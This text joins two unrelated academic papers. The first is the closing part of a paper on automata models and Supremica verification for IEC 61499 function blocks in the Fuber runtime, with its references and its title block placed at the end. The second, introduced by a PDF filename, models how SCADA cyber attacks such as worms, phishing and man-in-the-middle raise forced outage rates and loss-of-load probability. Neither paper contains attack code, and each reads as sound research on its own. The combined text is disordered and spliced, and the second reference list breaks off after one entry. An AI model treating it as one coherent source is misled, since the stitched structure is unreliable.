An alternative approach to the runtime implementation is a single-threaded function block execution that follows the event propagation through the blocks. This implementation approach means that a function block with an ECC state that has more than one action with an event output defined is executed in such a way that, when the first output is sent, the receiving block updates its ECC according to the received event, executes its algorithms and sends its event outputs, which in turn continue the chain before the flow of control is returned to the first block to send the next event output defined in the ECC state.

Fig. 14. Automaton model of the split instance.

In the example application this means that the split block sends EO1, the carriage receives EI, executes its algorithm, and sends EO. The fixture receives EI2 and executes its algorithm. Then the execution control is brought back to the split block, which sends the EO2 event. This behavior is represented by the models of the example application instances shown in Fig. 14, Fig. 15(a) and Fig. 15(b). The connection models are the same as in the previous section.

B. Formal Analysis

Methods and tools of supervisory control theory [30], [31] may be used with automata models to verify that a given behavior specification is satisfied by a model description. The same methods and tools may also be used for the synthesis of a scheduling function for the function blocks represented by the automata models, so that the specification is satisfied.

The specification for the correct behavior of the example control application (see Section III, Fig. 3) is that the OpenClamp algorithm is executed before the PushOut algorithm. This specification is represented by the automata models shown in Fig. 16. To verify whether the specification is satisfied by the automata models, the Supremica tool [26] was used. Checking if the specification above is fulfilled can be formulated as a nonblocking verification problem. To verify that a system is nonblocking, Supremica requires the user to specify accepting states. In this example all states except the non-initial states in the two specification automata are treated as accepting.

Nonblocking verification of the models and specifications above shows that the specification is fulfilled for the Fuber case, while this is not the case for the alternative runtime. Note that this analysis does not say that the Fuber execution model is correct for other applications, only that the specification is fulfilled for this specific application using the Fuber runtime.
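The difference between the two execution models can also be re-enacted directly on the example. The sketch below is a simplified, single-threaded re-enactment: it ignores the separation into event-executing and algorithm-executing threads, and it assumes that the split block only emits its two output events without running an algorithm of its own. Only the block, event and algorithm names are taken from the example; everything else is illustrative.

    # (block, input event) -> (algorithm executed, events emitted in order)
    from collections import deque

    HANDLERS = {
        ("split",    "EI"):  (None,          [("carriage", "EI"), ("fixture", "EI1")]),
        ("carriage", "EI"):  ("GetCarriage", [("fixture", "EI2")]),
        ("fixture",  "EI1"): ("OpenClamp",   []),
        ("fixture",  "EI2"): ("PushOut",     []),
    }

    def depth_first(block, event, order):
        # Alternative runtime: every output event is propagated to completion
        # before the sending block continues with its next action.
        algorithm, emissions = HANDLERS[(block, event)]
        if algorithm:
            order.append(algorithm)
        for target, target_event in emissions:
            depth_first(target, target_event, order)
        return order

    def queued(start_block, start_event):
        # Fuber-like execution: incoming events are queued per instance and the
        # instances are served one at a time from a FIFO instance queue.
        order, inputs = [], {b: deque() for b in ("split", "carriage", "fixture")}
        inputs[start_block].append(start_event)
        instance_queue = deque([start_block])
        while instance_queue:
            block = instance_queue.popleft()
            algorithm, emissions = HANDLERS[(block, inputs[block].popleft())]
            if algorithm:
                order.append(algorithm)
            for target, target_event in emissions:
                inputs[target].append(target_event)
                if target not in instance_queue:
                    instance_queue.append(target)
            if inputs[block] and block not in instance_queue:
                instance_queue.append(block)
        return order

    print("alternative runtime:", depth_first("split", "EI", []))  # GetCarriage, PushOut, OpenClamp
    print("Fuber-like runtime: ", queued("split", "EI"))           # GetCarriage, OpenClamp, PushOut

Under the queued execution OpenClamp precedes PushOut, while the depth-first propagation reverses the two, which is exactly the difference that the nonblocking verification detects.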
Fig. 15. Automata models for the alternative runtime implementation: (a) model of the carriage instance; (b) model of the fixture instance.

Fig. 16. Models of the specification of correct behavior for the example application in Fig. 3: (a) model for Fuber; (b) model for the alternative runtime approach. Both specifications model the same behavior.

VII. CONCLUSION

In order to reduce the time needed to develop distributed control systems, and to use new tools for finding misbehavior of an application during development, a new standard for distributed control systems is needed. The IEC 61499 standard is a step in the right direction; however, if an IEC 61499 application is expected to behave the same under two different runtime environments, the standard needs to specify more clearly the expected behavior of the scheduling function and how events between function blocks are propagated.

In order to be able to experiment with multiple execution models, Fuber, a runtime for IEC 61499 applications, has been developed. Some initial results on how it is possible to generate a formal model of an IEC 61499 application running inside Fuber have been presented. The formal model is expressed as a set of interacting automata in a format that is understood by the tool for supervisor verification and synthesis, Supremica.

Since Fuber is developed under an open-source license, others are welcome to start playing with it and possibly contribute some new features.

REFERENCES
[1] IEC, "IEC 61131 programmable controllers part 3: Programming languages," International Electrotechnical Commission, Tech. Rep., 1993.
[2] R. W. Lewis, Programming Industrial Control Systems using IEC 1131-3. The Institution of Electrical Engineers, 1995.
[3] OMG, "Common object request broker specification: Core specification," Object Management Group, Tech. Rep., 2004.
[4] D. Box, Essential COM. Addison-Wesley Professional, 1997.
[5] W3C, "SOAP version 1.2 part 1: Messaging framework," World Wide Web Consortium, Tech. Rep., 2004.
[6] ISO, "Industrial automation systems manufacturing message specification part 1: Service definition," International Organization for Standardization, Tech. Rep., 2003.
[7] F. Iwanitz and J. Lange, OPC Fundamentals, Implementation and Application. Hüthig Fachverlag, 2006.
[8] IEC, "IEC 61499-1: Function blocks part 1: Architecture," International Electrotechnical Commission, Tech. Rep., 2005.
[9] R. W. Lewis, Modelling Control Systems Using IEC 61499. The Institution of Electrical Engineers, 2001.
[10] H. Hanisch and V. Vyatkin, "Achieving reconfigurability of automation systems by using the new international standard IEC 61499: A developer's view," in The Industrial Information Technology Handbook. CRC Press, 2005, pp. 1-20.
[11] J. H. Christensen, "Function block development kit." [Online]. Available: http://www.holobloc.com
[12] K. C. Thramboulidis and C. S. Tranoris, "Developing a CASE tool for distributed control applications," Journal of Advanced Manufacturing Technology, vol. 24, no. 1-2, pp. 24-31, July 2004.
[13] TORERO Project. [Online]. Available: http://www.uni-magdeburg.de/iaf/cvs/torero
[14] IsaGraf ICS Triplex. [Online]. Available: http://www.isagraf.com
[15] K. Thramboulidis and A. Zoupas, "Real-time Java in control and automation: A model driven development approach," in Proceedings of the 10th IEEE International Conference on Emerging Technologies and Factory Automation (ETFA'05), 2005.
[16] G. Doukas and K. Thramboulidis, "A real-time Linux execution environment for function-block based distributed control applications," in Proceedings of the 3rd IEEE International Conference on Industrial Informatics (INDIN'05), 2005.
[17] K. Thramboulidis, "Development of distributed industrial control applications: The CORFU framework," in 4th IEEE International Workshop on Factory Communication Systems.
Institute of Electrical and Electronics Engineers Inc., Piscataway, NJ, USA, 2002, pp. 39-46.
[18] Archimedes system platform. [Online]. Available: http://seg.ee.upatras.gr/MIM/archimedes.htm
[19] V. Vyatkin, J. Christensen, and J. Lastra, "OOONEIDA: An open, object-oriented knowledge economy for intelligent distributed automation," IEEE Transactions on Industrial Informatics, vol. 1, no. 1, pp. 4-7, 2005.
[20] G. Cengic, K. Akesson, B. Lennartson, C. Yuan, and P. Ferreira, "Implementation of full synchronous composition using IEC 61499 function blocks," in Proceedings of the 2005 IEEE International Conference on Automation Science and Engineering. Edmonton, Canada: Institute of Electrical and Electronics Engineers Inc., Piscataway, NJ, USA, Aug. 2005, pp. 267-272.
[21] V. Vyatkin and H.-M. Hanisch, "Formal modeling and verification in the software engineering framework of IEC 61499: a way to self-verifying systems," in Proceedings of the 8th International Conference on Emerging Technologies and Factory Automation, ETFA 2001, vol. 2, 2001, pp. 113-118.
[22] C. Schnakenbourg, J.-M. Faure, and J.-J. Lesage, "Towards IEC 61499 function blocks diagrams verification," in Proceedings of the 2002 IEEE International Conference on Systems, Man and Cybernetics, vol. 3, 2002.
[23] M. Bonfe and C. Fantuzzi, "Design and verification of mechatronic object-oriented models for industrial control systems," in 2003 IEEE Conference on Emerging Technologies and Factory Automation. Proceedings, vol. 2, Lisbon, Portugal, 2003, pp. 253-260.
[24] L. Ferrarini and C. Veber, "Implementation approaches for the execution of IEC 61499 applications," in Proceedings of the 2004 2nd IEEE International Conference on Industrial Informatics. Institute of Electrical and Electronics Engineers Inc., Piscataway, NJ, USA, June 2004, pp. 612-617.
[25] Fuber IEC 61499 Function Block Execution Runtime. [Online]. Available: http://sourceforge.net/projects/fuber
[26] Supremica. [Online]. Available: http://www.supremica.org
[27] BeanShell. [Online]. Available: http://www.beanshell.org
[28] G. Booch, J. Rumbaugh, and I. Jacobson, Unified Modeling Language User Guide. Addison-Wesley, 1997.
[29] K. Akesson, M. Fabian, H. Flordal, and A. Vahidi, "Supremica, a tool for verification and synthesis of discrete event supervisors," in Proc. of the 11th Mediterranean Conference on Control and Automation, Rhodos, Greece, 2003.
[30] K. Akesson, "Methods and tools in supervisory control theory: Operator aspects, computation efficiency and applications," Ph.D. dissertation, Chalmers University of Technology, Göteborg, Sweden, 2002.
[31] P. J. Ramadge and W. M. Wonham, "The control of discrete event systems," Proc. of the IEEE, vol. 77, no. 1, pp. 81-98, 1989.
Formal Modeling of Function Block Applications Running in IEC 61499 Execution Runtime
Goran Cengic, Oscar Ljungkrantz and Knut Akesson
{cengic, oscar.ljungkrantz, knut}@chalmers.se
Department of Signals and Systems, Chalmers University of Technology, Sweden
Investigating_the_impact_of_cyber_attacks_on_power_system_reliability.pdf
As power grids rely more on open communication technologies and the supervisory control and data acquisition (SCADA) system, they are becoming more vulnerable to malicious cyber attacks. The reliability of the power system can be impacted by the SCADA system due to a diverse set of probable cyber attacks on it. This paper deals with the impact of cyber attacks on power system reliability. A forced outage rate (FOR) model is proposed considering the impacts of cyber attacks on the reliability characteristics of generators and transmission lines. Different occurrences of the cyber attacks targeting the SCADA system lead to different effects on the FOR values. The loss of load probability (LOLP) curves in two reliability test systems are simulated based on 10 different types of attacks on the SCADA system. The simulation results illustrate that the reliability of the power system decreases as the effects of cyber attacks on SCADA become more severe.
Investigating the Impact of Cyber Attacks on Power System Reliability
*Yichi Zhang, *Lingfeng Wang, and Weiqing Sun
*Department of Electrical Engineering and Computer Science, Department of Engineering Technology, The University of Toledo, Toledo, Ohio 43606, USA
Email: [email protected]

Keywords: power system reliability; SCADA system; cyber security; forced outage rate; loss of load probability.

I. INTRODUCTION

Drastic technological innovation has enabled the power system to become more flexible and to accommodate a more open architecture to fulfill the requirements of the modern power industry [1]. Also, as communication technology plays a crucial role by improving the efficiency of information management in the power system, more communication protocols and network structures are being investigated, which provides the power system with a more open development environment. Nowadays, the supervisory control and data acquisition (SCADA) system is an important part of the power grid, collecting data from remote facilities and sending back control commands. As the power grid becomes more complex and tightly coupled with the SCADA system, the resilience of the power system is challenged, as the power grid turns out to be more vulnerable to external cyber attacks than to internal errors of operation [2]. Thus, it is crucial to carry out an analysis of the vulnerability incurred by the cyber attacks between the SCADA and power system and to quantify the impacts due to the attacks. However, although the security problem of the SCADA and power system has been present for several years, due to the lack of quantification efforts [3] and the limited work on integrated analysis of both the SCADA system and the power system, an evaluation of the actual impact of cyber attacks on the power supply adequacy has been lacking thus far.

In order to conduct this evaluation, it is necessary to carry out a quantitative study of the severity of the cyber attacks for identifying the cascading failures in the cyber domain [3]. Since the power system is directly controlled by the SCADA system, it is useful to analyze the effects of the cyber attacks on the SCADA system, so that the impacts of cyber attacks on the power system can be derived. Thus, typical attacks launched against the SCADA system should be identified and their types need to be classified. Also, attacks targeting the control and communication functions of the SCADA system will yield different levels of risk to the power system. For instance, an infection by worms in the control subsystem of the SCADA system may shut down the whole SCADA, while some attacks may only slightly increase the vulnerabilities of the SCADA system. The influences of these attacks on the SCADA will incur different impacts on the power system. What is more, it is crucial to assess the realistic effects of various attacks on the components in the power grid based on their corresponding attack models. The generators, transmission lines, and loads in the power grid have different probabilities of failure, and these probabilities may be significantly different due to the reliability characteristics of their elements. Therefore, by studying the reliability characteristics of various components and the probabilistic models of different attacks on the SCADA system, the impacts on the reliability of the components in the power grid system can be evaluated, and the corresponding protection schemes can also be decided.
In this paper, by considering typical cyber attacks and their effects on the SCADA system, as well as the impacts of these attacks on different components of the power system, a forced outage rate (FOR) model is proposed, and a reliability analysis is performed to derive the loss of load probability (LOLP) curves using the FOR model in a Monte Carlo simulation (MCS). The organization of this paper is as follows: in Section II, related work on cyber attacks on the SCADA system and on reliability analysis is discussed. Typical attacks on the SCADA system and the proposed FOR model are described and analyzed in Section III. In Section IV, the LOLP curves in two reliability test systems are simulated and analyzed based on the MCS with the FOR values. The paper is concluded in Section V.

II. LITERATURE REVIEW

Since the power system is not only a network composed of generators and loads connected through transmission lines, but is also overlaid with a communication and control system such as SCADA, which manages the economic and secure operation [4], the estimation of the reliability of the power system and SCADA is significantly complicated and necessary. A number of studies on the power system and SCADA have focused on identifying the impacts on the power system.

A vulnerability assessment of the cyber security of the SCADA system controlling the power grid is illustrated in [5]. Two models of the SCADA systems, a firewall model and a password model, are generated for the simulation of attacks. The firewall model is used to regulate the packets between networks, while the password model is applied to monitor penetration attempts. With these two models, vulnerabilities of the SCADA system are evaluated in two scenarios, with attacks from inside and outside the network, and the vulnerability indices for each model are calculated. A similar investigation of vulnerability evaluation was conducted in [6] by using an attack tree approach. A reachability framework is developed in [2] to perform safety analysis for a two-area power system. An attack targeting the power system by gaining access to the Automatic Generation Control (AGC) can be identified using the reachability framework. However, this approach focuses on the two areas of the power system, rather than on the SCADA system. The vulnerabilities of industrial control networks are reviewed and discussed in [7]. The threats to devices in the power system, such as Programmable Logic Controllers (PLC), Distributed Control Systems (DCS), and Human Machine Interfaces (HMI) in the SCADA system, are analyzed, and a series of protection policies is developed and applied to increase both the internal and the external security of the network. Reference [8] gives a detailed review of the vulnerabilities and risks of various components of the electric power system. Since security flaws of SCADA are considered the main vulnerable point for remote access through the Internet, a new communication standard is needed for the encryption devices between the SCADA RTU and the modem linked to the Internet.
More of the literature focuses on the impacts of attacks or vulnerabilities on the SCADA system, which is highly related to the security of the entire power system. Reference [9] proposed a model of the control system in SCADA to identify the most critical sensors and attacks for anomaly detection. Three mathematical models of stealthy attacks are simulated as intrusions into the control system, and it was found that protecting against integrity attacks is more important than protecting against DoS attacks. This means the integrity attacks will lead to a more severe impact on the SCADA system. Similarly, [10] presented a risk assessment method using the Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) tool to evaluate the risk model, which identifies the severity levels of the threats and vulnerabilities in the control system. In [11], the Modbus DoS attack, which is composed of an email-based attack, a phishing attack, and a Modbus worm attack on SCADA, is analyzed for SCADA systems in the process network. The Modbus worm attack is tested in a power plant testbed, and it is concluded that effective attacks have to be launched with knowledge of the high-level architecture of the system. Also, it is found in [12] that about 78% of the incidents of external attacks between 2002 and 2006 were worms, viruses, and Trojan horses, and over 50% were worms. For instance, the Slammer worm has an extremely high infection rate, doubling itself every 8.5 seconds [13]. What is more, popular approaches that prevent risks and vulnerabilities, such as firewalls and intrusion detection systems, have been evaluated in the SCADA network environment [14], [15].

III. ATTACKS IN THE SCADA SYSTEM

There are multiple approaches to classifying the attacks in SCADA systems. In [13], three categories are distinguished based on the intention of launching the attacks: intentional targeted attacks, unintentional consequences caused by worms and viruses, and unintentional consequences raised by internal causes. In our study the attacks are classified by the effects brought to the SCADA system. The effects on the SCADA system concern confidentiality, integrity, and availability. Additionally, worms and viruses account for a great amount of the incidents of SCADA attacks and usually lead to the consequence of shutting down the whole system. Here worms and viruses are therefore separated from the other attacks, and their occurrences and effects will be described in this section.

When the attacks occur in the SCADA system, the control or the communications of the SCADA will be influenced by the effects of one or several of these attacks. With the failed controls from the SCADA, the management or the transmission of power may be affected in the power system. For example, a transmission line may be improperly tripped due to a relay setting modified by malicious intruders. This can be indicated as an increase of the forced outage rate (FOR) values of the components in the power system. FOR is a basic generating unit parameter for static capacity evaluation [16] and is used for forecasting the probability of the component being in the forced outage mode, which indicates the unavailability status. The FOR of a component in the power system is adjusted as shown in (1):

FOR_new = FOR_old + P_i · D_i    (1)

In (1), FOR_old is the original FOR value of the two kinds of components considered, the generators and the transmission lines, in various power systems. P_i is the probability of one type of attack occurring in the SCADA system, where i is the type of each attack.
D indicates the different impacts of the attacks, which occur with different probabilities. From the record of external attack incidents between 2002 and 2006, DoS attacks take the smallest part, 4% of the total record, and the attacks capable of ruining confidentiality and integrity take about 9% of the total attacks. The largest amount of attacks is generated by worms, viruses, and Trojan horses, which take 78% of the total incidents, and three types of worms account for over 50% of the total records [12]. The worms and viruses occupy a great portion of the recorded attacks, and the aspects impacted by worms and viruses might be a combination of confidentiality, integrity, and availability. Therefore, they are separated from the DoS attacks as well as from the confidentiality and integrity attacks. The rates of the attack distributions are generally denoted as P_i in this paper, but the values of P_i are variable, since the targets of attacks may change and the distributions of new attacks may differ from those of several years ago. These recorded rates of attacks are taken as the values of P_i, while some modifications of the rates for different attacks are made by considering the changes of vulnerabilities and targets in the SCADA system. D is represented by (2) and is influenced by three factors:

D = H · k · l    (2)

In (2), H indicates the risk level at which different components might be affected by the upcoming attacks. Two components, the generator and the transmission line of the power systems, are considered at different risk levels. Since the generator is more centralized and easier to control and manage, the probability of increased vulnerabilities and risks from the attacks is low. On the other hand, the transmission lines are constructed in a distributed mode, which makes them more vulnerable to attacks. Thus two risk levels, low and high, are given to the generator and the transmission lines, and the values are normalized as 0.2 and 0.7. k is a coefficient indicating whether the attack is easy to generate and launch. Some attacks such as worms are easy to generate and spread within a very short time, thus their corresponding values of k are labeled as high. In contrast, some attacks such as spoofing are generated by approaches with complex steps and expensive equipment, and their values of k are set lower. Finally, l implies the severity level of the impact that the attack may bring to the SCADA system. The attacks leading to immediate paralysis of the system are assigned higher l values, while the attacks that bring only slight vulnerability to the SCADA have lower l values.

In order to analyze the impact of cyber vulnerability on the power system through the attacks on the SCADA, 10 typical attacks, which can leave vulnerabilities and risks in the availability (DoS), confidentiality, and integrity of the SCADA system, are analyzed based on the classification and the influencing elements discussed above. Also, since worms and viruses take the largest part of all attacks, they are separated from the other attacks and considered as two additional types of attacks.

The typical DoS attacks on the SCADA system are the e-mail based attack, the phishing attack, and spoofing. As its name suggests, the e-mail based attack is launched through appropriate access by forging an e-mail with correct headers and contextual information.
With an attachment containing DoS malware, the malicious payload will be delivered to the target slaves once the malware is installed into the network, which will lead to the loss of synchronization between the master and slave machines. Thus it can be seen that the e-mail based attack has high values of both k and l. However, as pure DoS attacks are rarely implemented in the environment of the SCADA system, and the e-mail based attack can be prevented before it is delivered through the SCADA system, the occurrence of this attack is considered very rare, which means the value of its P is very low.

The phishing attack transmits a website that leads to DoS malware being downloaded by malicious scripts. Several steps are needed in order to launch this attack. First, some tricks such as a DNS poisoning attack are applied to make the operator visit the website with the malicious scripts; then the DoS malware is downloaded and executed when the scripts are viewed, and finally the communications or control in the SCADA system are blocked by the DoS attack. The process of launching the phishing attack is not as simple as the e-mail attack, due to the combination with other attacks, thus the value of its k is labeled as the middle level. However, based on the effect of this attack on the system, which shows that the communications between the components can be cut off, the severity level of this attack is still high. Fortunately, the occurrence of this type of attack is also rare, thus the P value of the phishing attack is very low.

The last popular DoS attack on the SCADA system is spoofing, which is also known as a replay attack [13]. By transmitting commands to the controller continuously and cutting off communications between devices, it may lead to undesirable results in both the SCADA system and the control devices in the power system. At the same time, some crucial data from the controller or HMI may be modified. This leads to a high value of l for the spoofing attack. However, this attack has the most difficult payload to operate, which makes spoofing one of the most complex attacks to execute. Thus the value of k of spoofing should be deemed low. Similar to the other DoS attacks, this attack is also rare in the total occurrence of attacks, which means its value of P is set the same as for the phishing attack.

The worm attack is a very effective and efficient technique to spread malicious attacks in the SCADA system [11]. Based on the record of attacks on SCADA from 2002 to 2006, over half of the attacks launched against SCADA were worms, namely the Slammer, Blaster, and Sasser worms. Worms are spread to the devices, leading to severe results such as a backdoor in the control components or other vulnerability issues. Once a machine is infected by the worm, it will attempt to spread the worm to new hosts and efficiently execute the malicious code. From the result of infections on the system, it can be found that all the slave machines become controlled by the worms [11]. Also, the attack of the Slammer worm disabled a safety monitoring system for about five hours, and it affected the Windows servers and communications networks by blocking the control system traffic in 2003 [13]. With these references, it can be concluded that all the levels of k, l, and P of the worms should be set higher than for the other attacks.

The viruses and Trojan horses result in similar effects as the worms by transmitting themselves with e-mails and opening a backdoor.
For instance, the Sobig virus spreads itself through e-mails when the victims check their e-mail, and then sends itself to other computers with the aid of addresses from the victims' address books. By shutting down train signaling systems, the viruses may also result in a severe paralysis of the whole system. Therefore, both the k and l values of the virus and Trojan should be labeled high, but not higher than those of the worms. At the same time, the probability of occurrence of viruses and Trojans is also high, occupying the second largest portion of the total amount of SCADA attacks.

Attacks that ruin the confidentiality of the SCADA system are the laying bait attack and the remote access attack. Compared with other attacks, the laying bait attack is easier to launch. By leaving USB drives containing malicious software near the target device and sending a forged e-mail to the operator of that device, a backdoor can be installed in the device with ease. Therefore, the value of k can be set very high. However, in most scenarios, confidentiality attacks only increase the risks of the SCADA system, such as data stealing or added unauthorized access, rather than controlling the operation directly. Thus the level of severity of the laying bait attack is quite low.

The remote access attack is a common attack, since multiple SCADA devices are installed with dial-up modems for remote access, to allow convenient operations on the devices remotely. This provides the adversaries with a backdoor for intruding into the control system, and the adversaries can enter the system with several approaches, such as password cracking software and modem searching programs. Reference [12] illustrates nine remote entry points for remote access, such as dial-up modems, the Internet, and wireless systems. With these potential backdoors, it is convenient to launch a remote access attack, which leads to a high value of k for this attack. Some remote connections may also leave the system highly vulnerable, since the adversaries and normal users may share the same approaches for entering the system and are granted the same high access levels. Thus the level of severity l should be higher than that of the laying bait attack. However, since this attack still belongs to the confidentiality attacks, the severity of the remote access attack is only set at the middle level.

The last confidentiality attack is vulnerability exploitation. Since no system is perfectly designed, vulnerabilities exist in all networks and systems of SCADA. Thus it is not rare that some adversaries intrude into the control system by taking advantage of these vulnerabilities. For instance, by applying a port scan and accessing a web server, the device that controls the web server may fail to function properly. However, the effects of this attack on the devices can be diverse, due to different failure modes. The device might be immediately shut down or seriously damaged, while the attack may also merely result in sluggish performance. Thus its value of l is given a large range. Based on the rate of the accumulated confidentiality attacks, the number of occurrences of these three attacks is larger than that of the pure DoS attacks, while still less than the number of worms and viruses.

The last two attacks target the integrity of the SCADA system: the man-in-the-middle attack and the change of instructions.
The integrity attacks can be enabled by the confidentiality attacks, which may provide unauthorized data or identities, so that the information of the objects can be modified or deleted. By launching a man-in-the-middle attack, some commands are altered or deleted, so that the operator may be required to perform a task which is not needed, or be told that everything is operating well when some operations are needed. This attack may result in various risks, depending on the alterations of the commands or control data. Also, since the effect of integrity attacks is more severe than that of the confidentiality attacks, the value of l is alternated between the middle and high levels. Furthermore, since it is a popular attack, the value of k can be set at the middle level. Based on the data of attack occurrences, the occurrence rate of the integrity attacks is identical to that of the confidentiality attacks.

The last type of attack is the change of instructions. It is not limited to the instructions or commands in the SCADA system; modifications of the configuration settings or of other cyber components can also be considered as this type of attack. In order to launch this kind of attack, the adversaries have to prepare a very complex payload in order to reach the system. This leads to a very low value of k, which is similar to the k value of the spoofing attack. However, the complicated process of launching the attack also increases its severity for the SCADA system.

The attacks on the SCADA system and their corresponding parameters are illustrated in Table I. The values of the parameters are decided based on the analysis of the SCADA attacks discussed previously. Considering the distribution of the attacks in the SCADA system in recent years, and similar results such as DoS caused by the worms and viruses, the P values of worms and viruses are limited to 30% and 20%. As for the values of l, due to the diverse components attacked and the different severities of the modified data, the effects of the vulnerability exploitation and man-in-the-middle attacks on the SCADA system can be dramatically different. Thus ranges are given to the l values of these two types of attacks, showing their variable influence on the system.

TABLE I. THE PARAMETERS OF ATTACKS IN THE SCADA SYSTEM

Attack                         k      l          P
e-mail based attack            0.8    0.8        2%
phishing attack                0.5    0.8        3%
spoofing                       0.2    0.8        3%
worm                           1      1          30%
virus and Trojan               0.8    0.8        20%
laying bait                    1      0.2        7%
remote access                  0.8    0.2        7%
vulnerability exploitation     0.5    0.2~0.8    10%
man-in-the-middle              0.5    0.5~0.8    9%
change of instructions         0.2    0.5        9%

IV. SIMULATION RESULTS AND ANALYSIS

A. FOR Curve for RTS79

The distributions of the attacks are illustrated in Fig. 1, based on the probabilities of attacks on the SCADA given in Table I. It can be seen that the worm and virus attacks take the majority portion while the DoS attacks occupy the smallest portion, and the confidentiality and integrity attacks take similar parts, between 7% and 10%.

Fig. 1. Probabilities of the attacks in SCADA.

Based on the different occurrences and severities of the 10 types of attacks discussed in Section III, the FOR values of the different components in the power system are influenced by these attacks and should be adjusted accordingly.
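As a concrete illustration of how Table I feeds formulas (1) and (2), the following sketch recomputes adjusted FOR values. Two caveats: the paper does not state exactly how H, k and l are combined, so the sketch assumes the product D_i = H · k_i · l_i, and the base FOR of 0.02 is an illustrative stand-in; the resulting numbers therefore will not reproduce Fig. 2 and Fig. 3 exactly. Ranged severities such as 0.2~0.8 are drawn uniformly at random, in line with the remark in Section IV about randomly picked values.

    # Illustrative recomputation of FOR_new = FOR_old + P_i * D_i with D_i = H * k_i * l_i
    # (the combination of H, k and l is an assumption, not spelled out in the paper).
    import random

    ATTACKS = {                       # attack: (k, l or (l_min, l_max), P)
        "e-mail based attack":        (0.8, 0.8, 0.02),
        "phishing attack":            (0.5, 0.8, 0.03),
        "spoofing":                   (0.2, 0.8, 0.03),
        "worm":                       (1.0, 1.0, 0.30),
        "virus and Trojan":           (0.8, 0.8, 0.20),
        "laying bait":                (1.0, 0.2, 0.07),
        "remote access":              (0.8, 0.2, 0.07),
        "vulnerability exploitation": (0.5, (0.2, 0.8), 0.10),
        "man-in-the-middle":          (0.5, (0.5, 0.8), 0.09),
        "change of instructions":     (0.2, 0.5, 0.09),
    }
    H_GENERATOR, H_LINE = 0.2, 0.7    # normalized risk levels from Section III

    def adjusted_for(for_old, H, attack):
        k, l, P = ATTACKS[attack]
        if isinstance(l, tuple):      # severity given as a range, e.g. 0.2~0.8
            l = random.uniform(*l)
        return for_old + P * H * k * l

    for attack in ATTACKS:
        print(f"{attack:27s}  generator: {adjusted_for(0.02, H_GENERATOR, attack):.4f}"
              f"  line: {adjusted_for(0.02, H_LINE, attack):.4f}")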
Since the same increments are added to the original FOR values of a generator and a transmission line, only one generator and one transmission line are selected from the RTS79, and the increased FOR values in the total of 10 scenarios are illustrated by the curves in Fig. 2 and Fig. 3, respectively.

Fig. 2. FOR curve of a generator in RTS79 (x-axis: scenarios of attacks).

It can be seen in Fig. 2 and Fig. 3 that the FOR curves of both the generator and the transmission line vary in a similar way as the distribution of the 10 types of SCADA attacks. As the values of H are set differently for the generator and the transmission lines, the two curves show different slopes. Since the risk level of the generator is set lower, which implies that the generator is less sensitive to the influence of the attacks, the increase of its FOR values is slight, as indicated by the gentle slope of the generator FOR curve. On the other hand, the influence on the transmission line is larger, as less protection is provided to the transmission lines, and thus the range of the FOR values of the transmission line is larger than that of the generator. It can also be seen that in both FOR curves the influence of the worms is the highest compared with the other attacks: the new values of FOR increase to 0.16 and 0.21.

Fig. 3. FOR curve of a transmission line in RTS79 (x-axis: scenarios of attacks).

B. LOLP Curve for RTS79 and MRTS

The LOLP curves for the IEEE RTS79 and the MRTS are derived and illustrated in Fig. 4, in red and blue lines respectively. Both curves exhibit similar variation characteristics, but it can be seen that the range of the MRTS LOLP values is slightly larger than that of the RTS79 LOLP values: the RTS79 LOLP curve ranges between 0.12 and 0.86, while the MRTS LOLP curve ranges between about 0.1 and 0.93. Since the values of LOLP are mainly controlled by the FOR values, the LOLP curves in both RTS79 and MRTS follow a similar pattern as the FOR curves. The largest LOLP values are induced by the impact of worms, which may leave the whole system paralyzed, since both LOLP values reach about 0.9. Similarly, the impacts of viruses and Trojans can also bring dramatic damage to the system, since both LOLP values exceed 0.5, while the MRTS system is more sensitive to these attacks. In both curves the first three values form the lowest part of the curves, which means that the impact of the DoS attacks is the smallest. It should also be noticed that, although the P values of the two confidentiality attacks are only slightly less than the P of the integrity attacks, their impacts on the power system are similar to those of the DoS attacks. This illustrates that confidentiality attacks have only a slight impact on the power system even though they account for a great amount of the records. What is more, the impacts of the confidentiality and integrity attacks are found to be similar. Although its P value is set higher than that of the other confidentiality and integrity attacks, the 8th LOLP value is found to be smaller than those of the other integrity attacks. This may be caused by the randomly picked value of the vulnerability exploitation attack, which has the least influence on the system.
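For readers who want to reproduce the general shape of such curves, the following minimal Monte Carlo sketch shows how adjusted FOR values feed a LOLP estimate. The unit capacities and the load level are illustrative stand-ins and are not the RTS79 or MRTS data used for Fig. 4.

    # Minimal Monte Carlo estimate of LOLP = P(available capacity < load).
    import random

    def estimate_lolp(unit_capacities, unit_fors, load, samples=100_000):
        loss_of_load = 0
        for _ in range(samples):
            available = sum(c for c, f in zip(unit_capacities, unit_fors)
                            if random.random() >= f)   # a unit is up with probability 1 - FOR
            if available < load:
                loss_of_load += 1
        return loss_of_load / samples

    units = [100, 100, 80, 50, 50]           # MW, illustrative only
    base_for = [0.02] * len(units)           # FOR without attacks
    attacked_for = [0.21] * len(units)       # e.g. FOR under the worm scenario
    print("LOLP (no attack):", estimate_lolp(units, base_for, load=300))
    print("LOLP (attacked): ", estimate_lolp(units, attacked_for, load=300))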
From the variations shown in the curves of Fig. 4, it can be seen that the impact of the cyber attacks on the overall power system agrees with the severity of the attacks in the SCADA system: when more severe attacks are launched against the SCADA system, more severe consequences are caused to the power system in terms of power supply reliability.

Fig. 4. LOLP curves for IEEE RTS79 and MRTS (x-axis: scenarios of attacks).

V. CONCLUSION AND FUTURE WORK

In this paper, ten types of cyber attacks and their effects on the SCADA system are analyzed. A probability-based forced outage rate (FOR) model of the generator and transmission line considering the cyber vulnerability aspects is proposed. This FOR model is derived by considering the distribution of attacks in SCADA and their impacts on the power system. The LOLP curves are derived using MCS for two typical power systems (IEEE RTS79 and MRTS) in 10 types of attack scenarios. The simulation results show that the power system becomes less reliable as both the occurrence and the severity of the attacks on the SCADA system increase.

In future research, more probable attacks and their effects on generators or transmission lines in different parts of the power system will be explored by building appropriate mathematical models. Also, though there are high similarities between the SCADA systems used in general industrial sectors and those used in power system automation, a more realistic model specific to power system applications should be derived for a more in-depth study of integrated cyber security and system reliability.

ACKNOWLEDGMENT

This work was in part supported by the National Science Foundation (NSF) under Award Number ECCS1128594.

REFERENCES
[1] C.-W. Ten, C.-C. Liu, and G. Manimaran, "Cyber-vulnerability of power grid monitoring and control systems," in Proceedings of the 4th Annual Workshop on Cyber Security and Information Intelligence Research (CSIIRW), Oak Ridge, TN, May 2008.
